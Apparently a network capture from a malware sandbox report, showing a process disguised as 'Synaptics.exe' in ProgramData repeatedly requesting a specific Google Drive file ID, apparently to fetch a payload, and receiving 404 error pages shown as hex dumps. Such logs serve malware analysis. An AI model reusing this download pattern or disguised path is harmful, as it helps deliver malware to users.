                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:56 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:56 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-4uE0aERkd6e_8LnUddv4bw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      90192.168.2.1150074142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:56 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:57 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC75oPaWL1DdcjJ-ZT5dDt4k1bcot08ZfNFuevV8zXGWMkYXVyyiieBezUr5X-RgzccQbKiNVMM
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:56 GMT
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-YMWO-FU4SCPd4G8pJW0Z-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:57 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:57 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 37 6f 36 5f 67 49 6b 35 67 62 36 47 72 75 4d 75 68 4d 49 70 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="b7o6_gIk5gb6GruMuhMIpA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:57 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      91192.168.2.1150075172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:56 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:56 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:56 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-WyNW95cWqTUJicTpU1HHrQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      92192.168.2.1150076142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:56 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:57 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC71c6y3GplwwShU1LhGdG_g7pm0GTJX7SBJwfDnQEz3EpUXoyGkdZx9Msf9FbTlOjszN0YR-SU
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:57 GMT
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-MpU-8d2JO0ezOY9_28hAfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:57 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:57 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 43 47 7a 37 57 6b 57 73 75 70 69 51 73 34 77 78 42 63 42 37 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="aCGz7WkWsupiQs4wxBcB7Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:57 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      93192.168.2.1150089172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:26:09 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:26:10 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:26:09 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-S-iOgTqWb2ve1J_cYbGhMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      94192.168.2.1150090142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:26:09 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:26:10 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC6R_z-zuhsl83xTgJEgO4UYwnSo2R8SnM8paV4nd1Z8FMtD1St3KIeUwX9jApjU_89RD58HdTo
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:26:10 GMT
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-0Gtfe_Y9ZfC2kdQeCvooqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:26:10 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:26:10 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 6b 51 68 68 36 64 61 39 6b 77 54 6c 44 6f 4a 47 41 4f 74 47 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="wkQhh6da9kwTlDoJGAOtGQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:26:10 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      95192.168.2.1150091142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:26:09 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:26:10 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC6zJLvFfmPw8MMxFtGiXpnJmlJ90Xc5gJBEOZ-KjeLqG9LdZPdwBbl2rJAQ_Egwlb04raVwmFQ
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:26:10 GMT
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-DFds0uMIRCKYInMkLif9tw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:26:10 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
